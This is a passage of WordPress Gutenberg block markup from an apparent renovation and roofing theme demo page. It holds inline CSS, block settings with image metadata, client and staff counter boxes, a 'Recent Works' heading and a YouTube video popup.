2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"ddc2115b-19da-4fd1-9373-7d3945f2a62f\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-ddc2115b-19da-4fd1-9373-7d3945f2a62f skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"87728901-354e-4436-8ea8-0b84a45f4e35\"} -->\n<style type=\"text/css\"> .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-87728901-354e-4436-8ea8-0b84a45f4e35 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-87728901-354e-4436-8ea8-0b84a45f4e35\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8b29f4fb-bfb3-4cdc-a0bc-fc8e24ae5dd6 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"2c42b546-5b19-4262-8165-7d9dd90f6b0c\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-2c42b546-5b19-4262-8165-7d9dd90f6b0c background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"c5ade1d9-8e73-4377-88eb-178302396f1d\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-c5ade1d9-8e73-4377-88eb-178302396f1d\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"b79f05c0-ebe5-4b26-815c-6970aa7a785d\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"8eaee92e-e616-46a2-9d4a-e683aac6ce2a\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-7\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-7 skt-blocks-block-section-outer-wrap block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"4bf804fe-a71c-426e-8620-9384e3ade2ba\"} -->\n<style type=\"text/css\"> .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; 